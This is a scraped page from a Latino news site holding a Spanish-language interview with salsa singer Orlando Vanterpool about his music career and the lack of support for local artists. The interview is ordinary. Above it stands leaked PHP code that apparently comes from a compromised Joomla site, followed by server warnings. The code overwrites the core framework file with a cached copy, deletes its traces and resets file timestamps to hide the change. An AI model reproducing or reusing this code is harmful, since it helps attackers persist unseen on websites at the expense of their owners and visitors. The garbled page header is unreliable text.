$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Orlando Vanterpool: “Quieren prostituir a la clase artística local”

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: Locales > Entrevistas > Orlando Vanterpool: “Quieren prostituir a la clase artística local”

Orlando Vanterpool: “Quieren prostituir a la clase artística local”

Imprimir PDF

ov

PROVIDENCE, RI.- Apasionado por la salsa de la “vieja escuela”, como el mismo define la música de Hector Lavoe, Victor Manuelle, Raulin Rosendo, entre otros, Orlando Vanterpool conversó con ACONTECER LATINO sobre sus inicios en la música, los exponentes del género que lo han inspirado y los retos que ha enfrentado en sus más de dos décadas en el ruedo artístico.

Vanterpool, de nacionalidad dominicana, fundó su propia banda hace diez años y refiere que, aunque le apasiona la música y el baile, “desafortunadamente, no creo que se pueda vivir de eso en este estado”.

El salsero local, quien en su haber cuenta con la grabación de cinco temas inéditos, dos de los cuales, asegura, fueron “éxitos” en su momento, se quejó del poco apoyo que el talento local recibe de la comunidad y criticó que algunas personas “quieran prostituir a la clase artística” al no respetar, valorar y creer en su talento.

Orlando Vanterpool adelantó que en los últimos años se ha dedicado a componer y no descartó, en un futuro cercano, volver a los estudios de grabaciones y “revivir con un nuevo tema el furor que provocó la salsa “Controversia” en el año 2012. Pero todo a su tiempo”.

ACONTECER LATINO: ¿Qué nos puedes decir de tus inicios en la música?

ORLANDO VANTERPOOL: Comencé a cantar a la edad de seis años en la escuela, pero mi primera presentación con orquesta fue a los 15 años en un homenaje a las madres en la Parroquia La Milagrosa de Los Mina. La influencia musical la recibí de mis hermanas y mi padre. Soy el cuarto hijo de cinco hermanos y el único varón de la familia. Mis hermanas cantaban en el coro de La Milagrosa y mi papá era guitarrista y cantante. Crecí rodeado de músicos y en mi adolescencia tomé clases de percusión, aprendí a tocar batería y tambora. Durante varios años fui profesor de baile. Enseñaba salsa, bachata y merengue en Miami y luego en Rhode Island.

AL: ¿Háblanos de tu trayectoria artística en RI?

OV: Llevo 17 años residiendo en Rhode Island. Aquí me he dedicado a la música, no al cien por ciento porque de esto no se vive. Cuando llegué al estado, estuve con varios grupos musicales, entre ellos Mambo Real, la orquesta de Van Lester y durante algún tiempo fui el vocalista de la orquesta del maestro Carlos De León, y hace 10 años formé mi propio grupo, Vanterpool y La Banda. Con mi orquesta, grabé en el 2007 dos temas, “Chaleco” y “No queda nada”. En el 2012 volví a los estudios para grabar “Controversia”, el cual fue todo un éxito en la radio local, seguido, en el 2014, por “Tereco”, que también sonó fuertemente en el estado. Estos dos temas son inéditos, el primero fue escrito por Van Lester y el segundo es de mi autoría.

AL: ¿Vive Orlando Vanterpool de la música?

OV: Desafortunadamente, no creo que ni el latino ni el americano puedan vivir de la música en este estado. No podemos dedicarnos solo a cantar porque de esto no se vive. Me gusta, es mi pasión, pero yo tengo un trabajo fijo. Soy supervisor del Departamento de Referidos en el área de Pediatría del Hospital de Rhode Island. Tengo que trabajar porque mi familia depende de mí. He tomado tiempo para prepararme y estudiar. Soy egresado de Salve Regina University, donde obtuve una maestría en Administración de Hospitales en el 2013. No me quejo de mi trabajo.

AL: ¿Por qué persistes en la música?

OV: Como te habrás dado cuenta, cuando viste a mi hijo cantar, con solo cuatro años, en la inauguración del árbol de Navidad en Olneyville en diciembre pasado, eso es algo que se lleva en la sangre. A mí la música me corre por las venas, es mi herencia familiar, mi pasión es cantar y hacer música. A veces lo pienso, tener que pasar tanto trabajo para hacer una fiesta, pero luego de un tiempo que no subo a un escenario, siento esa necesidad de volver a cantar. Me hace falta y estoy convencido de voy a dejar la música cuando me muera.

AL: ¿Se apoya el talento local en el estado?

OV: Los medios de comunicación apoyan el talento local. Sin temor a equivocarme, diría que la emisora Poder 1110 ha sido uno de los que más me ha apoyado. Lo mismo digo de Acontecer Latino que se ha propuesto resaltar a nuestros talentos en cada una de sus publicaciones. De los empresarios y comerciantes puedo decir que existe el deseo de apoyar el talento local. Pero no puedo decir lo mismo del público. La comunidad no va a los eventos de los artistas locales. La gente no va a los ‘shows’ de los artistas de aquí. Llenan una fiesta para ver un artista de fuera, pero se olvidan de los grandes talentos que tenemos en cada esquina.

AL: Mensaje a los nuevos talentos.

OV: Invito a los jóvenes que aman la música a perseguir sus sueños y no dejar que nadie los desanime. Siempre habrá piedras de tropiezo en el camino, pero al final nuestra pasión vencerá. Este es un medio difícil, hay que tener mucho temple, ser persistente y nunca dejar de perseguir nuestros sueños por personas que quieren prostituir a la clase artística local. Uno tiene que mantenerse vigilante.

Y aprovecho para hacer un llamado a que se nos respete y se nos apoye tanto a los músicos de la vieja guardia como a los nuevos talentos locales. Todo el que hace y se dedica a la música tiene a sus espaldas años de trabajo, sacrificio, desvelos y mucho estudio. Eso tiene valor y aquí no lo valoran.

Desafortunadamente, algunos se dejan prostituir y no le dan valor a su talento, mientras que otros no permitimos que ciertos depredadores nos usen a su antojo y conveniencia. Tengo 10 años con esta orquesta y he mantenido mi nombre y el de mis músicos siempre en alto. (Fotos Xavier Delbrey)